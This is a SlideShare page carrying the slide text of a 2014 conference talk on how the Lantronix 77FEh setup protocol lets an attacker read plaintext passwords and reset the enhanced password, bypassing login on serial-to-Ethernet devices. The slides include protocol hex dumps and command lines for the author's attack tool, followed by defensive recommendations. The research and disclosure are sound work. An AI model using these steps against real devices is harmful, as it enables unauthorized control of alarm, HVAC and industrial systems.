SlideShare una empresa de Scribd logo

CONFidence 2014: Vlatko Kosturjak: Exploring treasures of 77FEh

Descargar como ODP, PDF
PROIDEA
PROIDEA

If vendors need to expose serial interface to “modern” IP world, they often use ready-made solution like Lantronix. You can find different vendors to use these devices as part of different embedded systems – from alarms to legacy SCADA systems. If you find such devices on the Internet or LAN, the most imporant part is to check if 77FEh is enabled. We will cover already known stuff with 77FEh, but also new interesting findings in owning such devices. New tool to exploit all of this will be presented as well as counter-measures.

Tecnología
1 de 37
1 Mos Eisley Lab Confidence 2014 Exploring treasures of 77FEh Getting access to Lantronix devices Vlatko Kosturjak, Diverto @k0st
2 Mos Eisley Lab Who are you!?!!?? ● Security Jedi at Diverto – Bringing balance to the force ● Experience – Offensive (Penetration tester) – Defensive (Developer/System Administrator/...) – Have code in: Nmap, Metasploit, OpenVAS, … – Author of free software: https://github.com/kost/ ● If you trust in certificates – CISSP, C|EH, CISA, CISM, CRISC, MBCI, ...
3 Mos Eisley Lab Agenda ● Introduction - Lantronix ● Physical access ● WTF is 77FEh? ● Vulnerabilities & Exploitation ● Recommendations ● Questions and answers 45 minutes
4 Mos Eisley Lab Lantronix Source: www.lantronix.com
5 Mos Eisley Lab You can find them as integral part of ● Alarms ● HVACs ● Pool monitoring systems ● Sprinkler controllers ● Hacked vacuum cleaners - Roombas ● Embedded systems ● Industrial systems Source: http://ir.lantronix.com/phoenix.zhtml?c=122202&p=irol-newsA
6 Mos Eisley Lab What they are running actually? ● OS – CoBos (mostly) – Evolution OS/Linux – ThreadX – Linux ● Support – 1 or more serial ports – Modbus (few models) – 10/100 Ethernet
7 Mos Eisley Lab Physical access ● Like usual – Game over ● Serial access – No password by design ● Requirements – Standard TTL cable – BusPirate – ...
8 Mos Eisley Lab Connecting to serial port... ● 9600 bps 8/N/1 ● Flow control: None
9 Mos Eisley Lab Most frequent services Available – TCP/IP ● Web (tcp/80) ● Telnet (tcp/9999) ● 77FEh (tcp-udp/30718) ● SNMP (udp/161) Telnet administration interface What is this? Mostly information disclosures Simple web server Serving applet JAR which talks to 30718 port
10 Mos Eisley Lab Device Discovery ● Ask :) ● Look if you have physical access ● Passive ● Active/Scanning – Standard port scanning is fine with conservative timing – Broadcast UDP to specific Lantronix ports (30718) ● Beware – Version scanning(-sV) or running vulnerability scanners may misconfigure device –
11 Mos Eisley Lab Telnet administration $ telnet 192.168.1.101 9999 Trying 192.168.1.101... Connected to 192.168.1.101. Escape character is '^]'. MAC address DEADDEADDEAD Software version V5.8.8.3 (050801) XPTEXE AES library version 1.8.2.1 Password :
12 Mos Eisley Lab So, WTF is 77FEh finally? ● 0x77FE = 30718 (10) ● TCP/UDP protocol for device setup – Proprietary protocol – Used by DeviceInstaller (proprietary software from Lantronix) ● Designed for – Setup of device – Administration of device – Getting device info – Insecurity (sorry, had to write it, you'll see later ;) )
13 Mos Eisley Lab Sample 77FEh communication [v] Sending 4 bytes: 0x00000000 (00000) 000000f6 .... [v] Received 30 bytes: (00000) 000000f7 00108005 58324400 df0e0000 ........X2D..... (00016) 62a7d944 00000000 00204a91 84fb b..D..... J... ./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -Q <ip> Query setup request (4) Query setup response (4) MAC address of the device (6) Device type
14 Mos Eisley Lab Interesting request – #1 ● [v] Sending 4 bytes: ● 0x00000000 (00000) 000000f8 .... ● ● [v] Received 124 bytes: ● 0x00000000 (00000) 000000f9 c0a809c9 00000000 54455354 ............TEST ● 0x00000010 (00016) c0a80905 4c020000 141e141e 0a0a0a0a ....L........... ● 0x00000020 (00032) cc070000 00000000 00000000 00000000 ................ ● 0x00000030 (00048) 00000000 00000000 00000000 00000000 ................ ● 0x00000040 (00064) 00000000 00000000 00000000 00000000 ................ ● 0x00000050 (00080) 00000000 00000000 00000000 00000000 ................ ● 0x00000060 (00096) 00000000 00000000 00000000 00000000 ................ ● 0x00000070 (00112) 00000000 00000000 00000000 ............ Query setup (4) Simple Password In Plaintext (4) ./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -P <ip> IPv4 (4)
15 Mos Eisley Lab Previous – work ● Metasploit – Rob Vinson ● http://robvinson.org/blog/2012/07/08/lantronix-serial-to-etherne ● https://github.com/robvinson/metasploit-modules – Metasploit modules for simple passwords by jgor ● http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lant ● http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lant ● Tools – Simple C program by jgor ● https://github.com/jgor/lantronix-telnet-pw
16 Mos Eisley Lab But... ● Simple password is not set ● Device still asks for password ● Further digging – Enhanced password in place – You cannot get/reset the enhanced password easily – Length is bigger (4->16) – Challenge!!!
17 Mos Eisley Lab Introduction to enhanced passwords Source: Lantronix documentation Feature/Type Simple Password Enhanced Password Length 4 16 Visible in query setup yes no
18 Mos Eisley Lab Source: Mohdafri. com
19 Mos Eisley Lab Interesting request - #2 [v] Sending 4 bytes: 0x00000000 (00000) 000000f4 .... [v] Received 32 bytes: 0x00000000 (00000) 000000f5 09040000 00000000 54455354 ............TEST 0x00000010 (00016) 352e382e 382e3300 00000000 00000000 5.8.8.3......... 0x00000020 (00032) ./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -C <ip> Simple Password In Plaintext (4) Query ext version Request (4) Version (6)
20 Mos Eisley Lab Interesting request #3 ● Request to query configuration – 000000eX ● Response to query configuration – 000000bX + followed by 126 bytes of setup – ● X=number of setup records (0 – F): – 0 basic setup record ● Simple password, IP... – 1 security record ● Enhanced password, AES key, SNMP... – 2 specific products / situations – 3 OEMs – ... Wrong! Request for security record 1 provides just zero bytes! HALF
21 Mos Eisley Lab Interesting request #4 ● Request to change configuration – 000000cX + followed by 126 bytes of setup ● Response to change configuration – 000000bX – ● X=number of setup records (0 – F): – 0 basic setup record – 1 security record – 2 specific products / situations – 3 OEMs
22 Mos Eisley Lab Setting setup record 1 for security [v] Sending 130 bytes: 0x00000000 (00000) 000000c1 00000000 00000000 00000000 ................ 0x00000010 (00016) 00000000 00000000 00000000 00000000 ................ 0x00000020 (00032) 00000000 00007075 626c6963 00000000 ......public.... 0x00000030 (00048) 00000000 00000000 00000000 00000000 ................ 0x00000040 (00064) 00000000 00000000 00000000 00000000 ................ 0x00000050 (00080) 00000000 00000000 00000000 00000000 ................ 0x00000060 (00096) 00000000 00000000 00000000 00000000 ................ 0x00000070 (00112) 00000000 00000000 00000000 00000000 ................ 0x00000080 (00128) 0000 .. [v] Received 4 bytes: 0x00000000 (00000) 000000b1 .... ./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -E <ip> Setting Setup record 1 Was successful Set Setup record 1 (security) request SNMP Community String (13) Enhanced Password (16)
23 Mos Eisley Lab Enhanced password gone no password to enter! $ telnet 192.168.1.101 9999 Trying 192.168.1.101... Connected to 192.168.1.101. Escape character is '^]'. MAC address DEADDEADDEAD Software version V5.8.8.3 (050801) XPTEXE AES library version 1.8.2.1 Press Enter for Setup Mode
24 Mos Eisley Lab Authentication Algorithm Guess Authenticate Enhanced Password Simple Password Enhanced Not set Ask for enhanced Ask for simple Display setup menu Enhanced set Simple set Simple Not set Password OK
25 Mos Eisley Lab New tool: lantronix-witchcraft ● 77FEh protocol implementation ● 77FEh security related utility ● All the tricks mentioned implemented ● Free software: GPL2 ● Requirement: Perl ● Available at – https://github.com/kost/lantronix-witchcraft
26 Mos Eisley Lab Basic usage: ● Display Mac address: – ./lantronix-witchcraft.pl -Q <ip> ● Display Simple Password (up to 4 characters) – ./lantronix-witchcraft.pl -P <ip> ● Reset Security record (together with enhanced password) – ./lantronix-witchcraft.pl -E <ip> ● Reset Security record without AES (with enhanced password) – ./lantronix-witchcraft.pl -S <ip> ● Dump setup records – ./lantronix-witchcraft.pl -G -D <ip>
27 Mos Eisley Lab Brave enough? ● One command to rule them all ● Display Mac address and simple password, dump setup records, reset security records together with enhanced password: – – ./lantronix-witchcraft.pl -C -Q -P -E -G -D <ip> ●
28 Mos Eisley Lab Still wondering why automatic scanning is bad for Lantronix? ● ● Dump of setup record: 00000030 00 1c 00 03 00 4e 00 53 00 50 00 6c 00 61 00 79 |.....N.S.P.l.a.y| 00000040 00 65 00 72 00 2f 00 39 00 2e 00 30 00 2e 00 30 |.e.r./.9...0...0| 00000050 00 2e 00 32 00 39 00 38 00 30 00 3b 00 20 00 7b |...2.9.8.0.;. .{| 00000060 00 30 00 30 00 30 00 30 00 41 00 41 00 30 00 30 |.0.0.0.0.A.A.0.0| 00000070 00 2d 00 30 00 41 00 30 00 30 00 2d 00 30 02 ff |.-.0.A.0.0.-.0..|
29 Mos Eisley Lab Correct way ● Ask – Someone responsible if they could have something like that ● Send broadcast query packet to 77FEh ● Identify ports 30718 open (TCP or UDP) ● Dump setup records ● Play ;) ● Check if it is still working... – If yes, perfect – If not: huh, but you should restore setup records somehow ;)
30 Mos Eisley Lab It's not about Lantronix... ● ...they warned the vendors about it in their documentation Source: Lantronix documentation
31 Mos Eisley Lab Disclosure Problem ● It's more about vendors who implement Lantronix in their devices ● Whom to report? – Lantronix – I guess they know their protocol ;) – OEMs – hard to find all their customers ;) ● Awareness – Conference – Tools
32 Mos Eisley Lab But maybe it could be done... ● Add white list ● Encryption/SSL? Source: Lantronix documentation
33 Mos Eisley Lab Recommendations ● Have some other device to VPN/SSL tunnel the services ● Telnet only through VPN or other secure channel to administration interface ● Disable 77FEh if not needed ● Filter out 77FEh on network devices to only allowed ones ● Disable other unneccesary services (SNMP, telnet, etc).
34 Mos Eisley Lab Summary Source: duki@fb
35 Mos Eisley Lab Summary ● There are ways to pass beyond authentication (if 77FEh is enabled) – Simple passwords – Enhanced passwords ● Tools – Metasploit Lantronix modules – https://github.com/kost/lantronix-witchcraft ● Recommendations – Disable 77FEh if not needed or Filter out 77FEh on network devices to only allowed ones – Tunnel VPN/SSL all communication to these devices ● Future – There are things to research: way to obtain enhanced password or AES keys for example
36 Mos Eisley Lab Acknowledgements - Thanks ● Previous work (Simple Passwords) – Rob Vinson ● http://robvinson.org/blog/2012/07/08/lantronix-serial-to-etherne ● https://github.com/robvinson/metasploit-modules – Metasploit modules for simple passwords by jgor ● http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lan ● http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lan ● https://github.com/jgor/lantronix-telnet-pw ● Colleagues – Dalibor Dosegović, hardware wizard
37 Mos Eisley Lab Thank you! Questions and Answers @k0st

Recomendados

DEP/ASLR bypass without ROP/JIT
DEP/ASLR bypass without ROP/JITDEP/ASLR bypass without ROP/JIT
DEP/ASLR bypass without ROP/JITArtem I. Baranov
 
IBM Global Security Kit as a Cryptographic layer for IBM middleware
IBM Global Security Kit as a Cryptographic layer for IBM middlewareIBM Global Security Kit as a Cryptographic layer for IBM middleware
IBM Global Security Kit as a Cryptographic layer for IBM middlewareOktawian Powazka
 
A Modern Fairy Tale: Java Serialization
A Modern Fairy Tale: Java Serialization A Modern Fairy Tale: Java Serialization
A Modern Fairy Tale: Java Serialization Steve Poole
 
Systems and methods for visual presentation and selection of ivr menu
Systems and methods for visual presentation and selection of ivr menuSystems and methods for visual presentation and selection of ivr menu
Systems and methods for visual presentation and selection of ivr menuTal Lavian Ph.D.
 
Research overview Oct. 2018
Research overview Oct. 2018Research overview Oct. 2018
Research overview Oct. 2018XavierDevroey
 
Systems and methods for visual presentation and selection of ivr menu
Systems and methods for visual presentation and selection of ivr menuSystems and methods for visual presentation and selection of ivr menu
Systems and methods for visual presentation and selection of ivr menuTal Lavian Ph.D.
 
Bowling Game Kata
Bowling Game KataBowling Game Kata
Bowling Game Kataguest958d7
 
NEO Smartcontract Programing with Python
NEO Smartcontract Programing with PythonNEO Smartcontract Programing with Python
NEO Smartcontract Programing with PythonShizuka Eguchi
 

Recomendados

DEP/ASLR bypass without ROP/JIT
DEP/ASLR bypass without ROP/JITDEP/ASLR bypass without ROP/JIT
DEP/ASLR bypass without ROP/JITArtem I. Baranov
 
IBM Global Security Kit as a Cryptographic layer for IBM middleware
IBM Global Security Kit as a Cryptographic layer for IBM middlewareIBM Global Security Kit as a Cryptographic layer for IBM middleware
IBM Global Security Kit as a Cryptographic layer for IBM middlewareOktawian Powazka
 
A Modern Fairy Tale: Java Serialization
A Modern Fairy Tale: Java Serialization A Modern Fairy Tale: Java Serialization
A Modern Fairy Tale: Java Serialization Steve Poole
 
Systems and methods for visual presentation and selection of ivr menu
Systems and methods for visual presentation and selection of ivr menuSystems and methods for visual presentation and selection of ivr menu
Systems and methods for visual presentation and selection of ivr menuTal Lavian Ph.D.
 
Research overview Oct. 2018
Research overview Oct. 2018Research overview Oct. 2018
Research overview Oct. 2018XavierDevroey
 
Systems and methods for visual presentation and selection of ivr menu
Systems and methods for visual presentation and selection of ivr menuSystems and methods for visual presentation and selection of ivr menu
Systems and methods for visual presentation and selection of ivr menuTal Lavian Ph.D.
 
Bowling Game Kata
Bowling Game KataBowling Game Kata
Bowling Game Kataguest958d7
 
NEO Smartcontract Programing with Python
NEO Smartcontract Programing with PythonNEO Smartcontract Programing with Python
NEO Smartcontract Programing with PythonShizuka Eguchi
 
CONFidence 2014: Alexander Timorin: SCADA deep inside: protocols and security...
CONFidence 2014: Alexander Timorin: SCADA deep inside: protocols and security...CONFidence 2014: Alexander Timorin: SCADA deep inside: protocols and security...
CONFidence 2014: Alexander Timorin: SCADA deep inside: protocols and security...PROIDEA
 
JDD2015: Trudne Rozmowy [WORKSHOP] - Mariusz Sieraczkiewicz
JDD2015: Trudne Rozmowy [WORKSHOP] - Mariusz SieraczkiewiczJDD2015: Trudne Rozmowy [WORKSHOP] - Mariusz Sieraczkiewicz
JDD2015: Trudne Rozmowy [WORKSHOP] - Mariusz SieraczkiewiczPROIDEA
 
JDD2015: Migrating to continuous delivery in the world of financial trading -...
JDD2015: Migrating to continuous delivery in the world of financial trading -...JDD2015: Migrating to continuous delivery in the world of financial trading -...
JDD2015: Migrating to continuous delivery in the world of financial trading -...PROIDEA
 
Atmosphere 2014: RE:SPONSIBILITY - Matt Harasymczuk
Atmosphere 2014: RE:SPONSIBILITY - Matt HarasymczukAtmosphere 2014: RE:SPONSIBILITY - Matt Harasymczuk
Atmosphere 2014: RE:SPONSIBILITY - Matt HarasymczukPROIDEA
 
Atmosphere 2014: Helping the Internet to scale since 1998 - Paweł Kuśmierski
Atmosphere 2014: Helping the Internet to scale since 1998 - Paweł KuśmierskiAtmosphere 2014: Helping the Internet to scale since 1998 - Paweł Kuśmierski
Atmosphere 2014: Helping the Internet to scale since 1998 - Paweł KuśmierskiPROIDEA
 
JDD2015: Towards the Fastest (J)VM on the Planet! - Jaroslav Tulach
JDD2015: Towards the Fastest (J)VM on the Planet! - Jaroslav TulachJDD2015: Towards the Fastest (J)VM on the Planet! - Jaroslav Tulach
JDD2015: Towards the Fastest (J)VM on the Planet! - Jaroslav TulachPROIDEA
 
CONFidence 2014: Dimitriy Chastuhin: All your sap p@$$w0яd z belong to us
CONFidence 2014: Dimitriy Chastuhin: All your sap p@$$w0яd z belong to usCONFidence 2014: Dimitriy Chastuhin: All your sap p@$$w0яd z belong to us
CONFidence 2014: Dimitriy Chastuhin: All your sap p@$$w0яd z belong to usPROIDEA
 
Atmosphere 2014: Scaling and securing node.js apps - Maciej Lasyk
Atmosphere 2014: Scaling and securing node.js apps - Maciej LasykAtmosphere 2014: Scaling and securing node.js apps - Maciej Lasyk
Atmosphere 2014: Scaling and securing node.js apps - Maciej LasykPROIDEA
 
JDD2015: Don’t Panic – Hitchhiker’s guide to the JVM monitoring - Wojciech Oc...
JDD2015: Don’t Panic – Hitchhiker’s guide to the JVM monitoring - Wojciech Oc...JDD2015: Don’t Panic – Hitchhiker’s guide to the JVM monitoring - Wojciech Oc...
JDD2015: Don’t Panic – Hitchhiker’s guide to the JVM monitoring - Wojciech Oc...PROIDEA
 
Atmosphere 2014: Centralized log management based on Logstash and Kibana - ca...
Atmosphere 2014: Centralized log management based on Logstash and Kibana - ca...Atmosphere 2014: Centralized log management based on Logstash and Kibana - ca...
Atmosphere 2014: Centralized log management based on Logstash and Kibana - ca...PROIDEA
 
Atmosphere 2014: JUnit: beyond the basics - Adam Dudczak
Atmosphere 2014: JUnit: beyond the basics - Adam DudczakAtmosphere 2014: JUnit: beyond the basics - Adam Dudczak
Atmosphere 2014: JUnit: beyond the basics - Adam DudczakPROIDEA
 
JDD2015: Ratpack: core of your micro-services - Andrey Adamovich
JDD2015: Ratpack: core of your micro-services - Andrey AdamovichJDD2015: Ratpack: core of your micro-services - Andrey Adamovich
JDD2015: Ratpack: core of your micro-services - Andrey AdamovichPROIDEA
 
JDD2015: DDD w praktyce, czyli jak wdrażamy i uczymy się DDD w Allegro - Krzy...
JDD2015: DDD w praktyce, czyli jak wdrażamy i uczymy się DDD w Allegro - Krzy...JDD2015: DDD w praktyce, czyli jak wdrażamy i uczymy się DDD w Allegro - Krzy...
JDD2015: DDD w praktyce, czyli jak wdrażamy i uczymy się DDD w Allegro - Krzy...PROIDEA
 
PLNOG15 :Contagious SDN - consequences of dealing with it, Paweł Korzec
PLNOG15 :Contagious SDN - consequences of dealing with it, Paweł KorzecPLNOG15 :Contagious SDN - consequences of dealing with it, Paweł Korzec
PLNOG15 :Contagious SDN - consequences of dealing with it, Paweł KorzecPROIDEA
 
PLNOG14: Zmiany w prawie konsumenckim i ochronie prywatności w 2015 r. - Artu...
PLNOG14: Zmiany w prawie konsumenckim i ochronie prywatności w 2015 r. - Artu...PLNOG14: Zmiany w prawie konsumenckim i ochronie prywatności w 2015 r. - Artu...
PLNOG14: Zmiany w prawie konsumenckim i ochronie prywatności w 2015 r. - Artu...PROIDEA
 
JDD2014: Conversation patterns for software professionals - Michał Bartyzel
JDD2014: Conversation patterns for software professionals - Michał BartyzelJDD2014: Conversation patterns for software professionals - Michał Bartyzel
JDD2014: Conversation patterns for software professionals - Michał BartyzelPROIDEA
 
4Developers 2015: Gamedev-grade debugging - Leszek Godlewski
4Developers 2015: Gamedev-grade debugging - Leszek Godlewski4Developers 2015: Gamedev-grade debugging - Leszek Godlewski
4Developers 2015: Gamedev-grade debugging - Leszek GodlewskiPROIDEA
 
Men & Women Top 5 Trends for Your Sartorial Wardrobe
Men & Women Top 5 Trends for Your Sartorial WardrobeMen & Women Top 5 Trends for Your Sartorial Wardrobe
Men & Women Top 5 Trends for Your Sartorial WardrobeDedicatedfolloweroffashion
 
Top Tips to enhance your Wardrobe
Top Tips to enhance your WardrobeTop Tips to enhance your Wardrobe
Top Tips to enhance your WardrobeDedicatedfolloweroffashion
 
PLNOG15: Network Migration and Service Assurance using Smart SFP Modules - To...
PLNOG15: Network Migration and Service Assurance using Smart SFP Modules - To...PLNOG15: Network Migration and Service Assurance using Smart SFP Modules - To...
PLNOG15: Network Migration and Service Assurance using Smart SFP Modules - To...PROIDEA
 
Windows Debugging with WinDbg
Windows Debugging with WinDbgWindows Debugging with WinDbg
Windows Debugging with WinDbgArno Huetter
 
Csw2016 wheeler barksdale-gruskovnjak-execute_mypacket
Csw2016 wheeler barksdale-gruskovnjak-execute_mypacketCsw2016 wheeler barksdale-gruskovnjak-execute_mypacket
Csw2016 wheeler barksdale-gruskovnjak-execute_mypacketCanSecWest
 

Más contenido relacionado

Destacado

CONFidence 2014: Alexander Timorin: SCADA deep inside: protocols and security...
CONFidence 2014: Alexander Timorin: SCADA deep inside: protocols and security...CONFidence 2014: Alexander Timorin: SCADA deep inside: protocols and security...
CONFidence 2014: Alexander Timorin: SCADA deep inside: protocols and security...PROIDEA
 
JDD2015: Trudne Rozmowy [WORKSHOP] - Mariusz Sieraczkiewicz
JDD2015: Trudne Rozmowy [WORKSHOP] - Mariusz SieraczkiewiczJDD2015: Trudne Rozmowy [WORKSHOP] - Mariusz Sieraczkiewicz
JDD2015: Trudne Rozmowy [WORKSHOP] - Mariusz SieraczkiewiczPROIDEA
 
JDD2015: Migrating to continuous delivery in the world of financial trading -...
JDD2015: Migrating to continuous delivery in the world of financial trading -...JDD2015: Migrating to continuous delivery in the world of financial trading -...
JDD2015: Migrating to continuous delivery in the world of financial trading -...PROIDEA
 
Atmosphere 2014: RE:SPONSIBILITY - Matt Harasymczuk
Atmosphere 2014: RE:SPONSIBILITY - Matt HarasymczukAtmosphere 2014: RE:SPONSIBILITY - Matt Harasymczuk
Atmosphere 2014: RE:SPONSIBILITY - Matt HarasymczukPROIDEA
 
Atmosphere 2014: Helping the Internet to scale since 1998 - Paweł Kuśmierski
Atmosphere 2014: Helping the Internet to scale since 1998 - Paweł KuśmierskiAtmosphere 2014: Helping the Internet to scale since 1998 - Paweł Kuśmierski
Atmosphere 2014: Helping the Internet to scale since 1998 - Paweł KuśmierskiPROIDEA
 
JDD2015: Towards the Fastest (J)VM on the Planet! - Jaroslav Tulach
JDD2015: Towards the Fastest (J)VM on the Planet! - Jaroslav TulachJDD2015: Towards the Fastest (J)VM on the Planet! - Jaroslav Tulach
JDD2015: Towards the Fastest (J)VM on the Planet! - Jaroslav TulachPROIDEA
 
CONFidence 2014: Dimitriy Chastuhin: All your sap p@$$w0яd z belong to us
CONFidence 2014: Dimitriy Chastuhin: All your sap p@$$w0яd z belong to usCONFidence 2014: Dimitriy Chastuhin: All your sap p@$$w0яd z belong to us
CONFidence 2014: Dimitriy Chastuhin: All your sap p@$$w0яd z belong to usPROIDEA
 
Atmosphere 2014: Scaling and securing node.js apps - Maciej Lasyk
Atmosphere 2014: Scaling and securing node.js apps - Maciej LasykAtmosphere 2014: Scaling and securing node.js apps - Maciej Lasyk
Atmosphere 2014: Scaling and securing node.js apps - Maciej LasykPROIDEA
 
JDD2015: Don’t Panic – Hitchhiker’s guide to the JVM monitoring - Wojciech Oc...
JDD2015: Don’t Panic – Hitchhiker’s guide to the JVM monitoring - Wojciech Oc...JDD2015: Don’t Panic – Hitchhiker’s guide to the JVM monitoring - Wojciech Oc...
JDD2015: Don’t Panic – Hitchhiker’s guide to the JVM monitoring - Wojciech Oc...PROIDEA
 
Atmosphere 2014: Centralized log management based on Logstash and Kibana - ca...
Atmosphere 2014: Centralized log management based on Logstash and Kibana - ca...Atmosphere 2014: Centralized log management based on Logstash and Kibana - ca...
Atmosphere 2014: Centralized log management based on Logstash and Kibana - ca...PROIDEA
 
Atmosphere 2014: JUnit: beyond the basics - Adam Dudczak
Atmosphere 2014: JUnit: beyond the basics - Adam DudczakAtmosphere 2014: JUnit: beyond the basics - Adam Dudczak
Atmosphere 2014: JUnit: beyond the basics - Adam DudczakPROIDEA
 
JDD2015: Ratpack: core of your micro-services - Andrey Adamovich
JDD2015: Ratpack: core of your micro-services - Andrey AdamovichJDD2015: Ratpack: core of your micro-services - Andrey Adamovich
JDD2015: Ratpack: core of your micro-services - Andrey AdamovichPROIDEA
 
JDD2015: DDD w praktyce, czyli jak wdrażamy i uczymy się DDD w Allegro - Krzy...
JDD2015: DDD w praktyce, czyli jak wdrażamy i uczymy się DDD w Allegro - Krzy...JDD2015: DDD w praktyce, czyli jak wdrażamy i uczymy się DDD w Allegro - Krzy...
JDD2015: DDD w praktyce, czyli jak wdrażamy i uczymy się DDD w Allegro - Krzy...PROIDEA
 
PLNOG15 :Contagious SDN - consequences of dealing with it, Paweł Korzec
PLNOG15 :Contagious SDN - consequences of dealing with it, Paweł KorzecPLNOG15 :Contagious SDN - consequences of dealing with it, Paweł Korzec
PLNOG15 :Contagious SDN - consequences of dealing with it, Paweł KorzecPROIDEA
 
PLNOG14: Zmiany w prawie konsumenckim i ochronie prywatności w 2015 r. - Artu...
PLNOG14: Zmiany w prawie konsumenckim i ochronie prywatności w 2015 r. - Artu...PLNOG14: Zmiany w prawie konsumenckim i ochronie prywatności w 2015 r. - Artu...
PLNOG14: Zmiany w prawie konsumenckim i ochronie prywatności w 2015 r. - Artu...PROIDEA
 
JDD2014: Conversation patterns for software professionals - Michał Bartyzel
JDD2014: Conversation patterns for software professionals - Michał BartyzelJDD2014: Conversation patterns for software professionals - Michał Bartyzel
JDD2014: Conversation patterns for software professionals - Michał BartyzelPROIDEA
 
4Developers 2015: Gamedev-grade debugging - Leszek Godlewski
4Developers 2015: Gamedev-grade debugging - Leszek Godlewski4Developers 2015: Gamedev-grade debugging - Leszek Godlewski
4Developers 2015: Gamedev-grade debugging - Leszek GodlewskiPROIDEA
 
Men & Women Top 5 Trends for Your Sartorial Wardrobe
Men & Women Top 5 Trends for Your Sartorial WardrobeMen & Women Top 5 Trends for Your Sartorial Wardrobe
Men & Women Top 5 Trends for Your Sartorial WardrobeDedicatedfolloweroffashion
 
PLNOG15: Network Migration and Service Assurance using Smart SFP Modules - To...
PLNOG15: Network Migration and Service Assurance using Smart SFP Modules - To...PLNOG15: Network Migration and Service Assurance using Smart SFP Modules - To...
PLNOG15: Network Migration and Service Assurance using Smart SFP Modules - To...PROIDEA
 

Destacado (20)

CONFidence 2014: Alexander Timorin: SCADA deep inside: protocols and security...
CONFidence 2014: Alexander Timorin: SCADA deep inside: protocols and security...CONFidence 2014: Alexander Timorin: SCADA deep inside: protocols and security...
CONFidence 2014: Alexander Timorin: SCADA deep inside: protocols and security...
 
JDD2015: Trudne Rozmowy [WORKSHOP] - Mariusz Sieraczkiewicz
JDD2015: Trudne Rozmowy [WORKSHOP] - Mariusz SieraczkiewiczJDD2015: Trudne Rozmowy [WORKSHOP] - Mariusz Sieraczkiewicz
JDD2015: Trudne Rozmowy [WORKSHOP] - Mariusz Sieraczkiewicz
 
JDD2015: Migrating to continuous delivery in the world of financial trading -...
JDD2015: Migrating to continuous delivery in the world of financial trading -...JDD2015: Migrating to continuous delivery in the world of financial trading -...
JDD2015: Migrating to continuous delivery in the world of financial trading -...
 
Atmosphere 2014: RE:SPONSIBILITY - Matt Harasymczuk
Atmosphere 2014: RE:SPONSIBILITY - Matt HarasymczukAtmosphere 2014: RE:SPONSIBILITY - Matt Harasymczuk
Atmosphere 2014: RE:SPONSIBILITY - Matt Harasymczuk
 
Atmosphere 2014: Helping the Internet to scale since 1998 - Paweł Kuśmierski
Atmosphere 2014: Helping the Internet to scale since 1998 - Paweł KuśmierskiAtmosphere 2014: Helping the Internet to scale since 1998 - Paweł Kuśmierski
Atmosphere 2014: Helping the Internet to scale since 1998 - Paweł Kuśmierski
 
JDD2015: Towards the Fastest (J)VM on the Planet! - Jaroslav Tulach
JDD2015: Towards the Fastest (J)VM on the Planet! - Jaroslav TulachJDD2015: Towards the Fastest (J)VM on the Planet! - Jaroslav Tulach
JDD2015: Towards the Fastest (J)VM on the Planet! - Jaroslav Tulach
 
CONFidence 2014: Dimitriy Chastuhin: All your sap p@$$w0яd z belong to us
CONFidence 2014: Dimitriy Chastuhin: All your sap p@$$w0яd z belong to usCONFidence 2014: Dimitriy Chastuhin: All your sap p@$$w0яd z belong to us
CONFidence 2014: Dimitriy Chastuhin: All your sap p@$$w0яd z belong to us
 
Atmosphere 2014: Scaling and securing node.js apps - Maciej Lasyk
Atmosphere 2014: Scaling and securing node.js apps - Maciej LasykAtmosphere 2014: Scaling and securing node.js apps - Maciej Lasyk
Atmosphere 2014: Scaling and securing node.js apps - Maciej Lasyk
 
JDD2015: Don’t Panic – Hitchhiker’s guide to the JVM monitoring - Wojciech Oc...
JDD2015: Don’t Panic – Hitchhiker’s guide to the JVM monitoring - Wojciech Oc...JDD2015: Don’t Panic – Hitchhiker’s guide to the JVM monitoring - Wojciech Oc...
JDD2015: Don’t Panic – Hitchhiker’s guide to the JVM monitoring - Wojciech Oc...
 
Atmosphere 2014: Centralized log management based on Logstash and Kibana - ca...
Atmosphere 2014: Centralized log management based on Logstash and Kibana - ca...Atmosphere 2014: Centralized log management based on Logstash and Kibana - ca...
Atmosphere 2014: Centralized log management based on Logstash and Kibana - ca...
 
Atmosphere 2014: JUnit: beyond the basics - Adam Dudczak
Atmosphere 2014: JUnit: beyond the basics - Adam DudczakAtmosphere 2014: JUnit: beyond the basics - Adam Dudczak
Atmosphere 2014: JUnit: beyond the basics - Adam Dudczak
 
JDD2015: Ratpack: core of your micro-services - Andrey Adamovich
JDD2015: Ratpack: core of your micro-services - Andrey AdamovichJDD2015: Ratpack: core of your micro-services - Andrey Adamovich
JDD2015: Ratpack: core of your micro-services - Andrey Adamovich
 
JDD2015: DDD w praktyce, czyli jak wdrażamy i uczymy się DDD w Allegro - Krzy...
JDD2015: DDD w praktyce, czyli jak wdrażamy i uczymy się DDD w Allegro - Krzy...JDD2015: DDD w praktyce, czyli jak wdrażamy i uczymy się DDD w Allegro - Krzy...
JDD2015: DDD w praktyce, czyli jak wdrażamy i uczymy się DDD w Allegro - Krzy...
 
PLNOG15 :Contagious SDN - consequences of dealing with it, Paweł Korzec
PLNOG15 :Contagious SDN - consequences of dealing with it, Paweł KorzecPLNOG15 :Contagious SDN - consequences of dealing with it, Paweł Korzec
PLNOG15 :Contagious SDN - consequences of dealing with it, Paweł Korzec
 
PLNOG14: Zmiany w prawie konsumenckim i ochronie prywatności w 2015 r. - Artu...
PLNOG14: Zmiany w prawie konsumenckim i ochronie prywatności w 2015 r. - Artu...PLNOG14: Zmiany w prawie konsumenckim i ochronie prywatności w 2015 r. - Artu...
PLNOG14: Zmiany w prawie konsumenckim i ochronie prywatności w 2015 r. - Artu...
 
JDD2014: Conversation patterns for software professionals - Michał Bartyzel
JDD2014: Conversation patterns for software professionals - Michał BartyzelJDD2014: Conversation patterns for software professionals - Michał Bartyzel
JDD2014: Conversation patterns for software professionals - Michał Bartyzel
 
4Developers 2015: Gamedev-grade debugging - Leszek Godlewski
4Developers 2015: Gamedev-grade debugging - Leszek Godlewski4Developers 2015: Gamedev-grade debugging - Leszek Godlewski
4Developers 2015: Gamedev-grade debugging - Leszek Godlewski
 
Men & Women Top 5 Trends for Your Sartorial Wardrobe
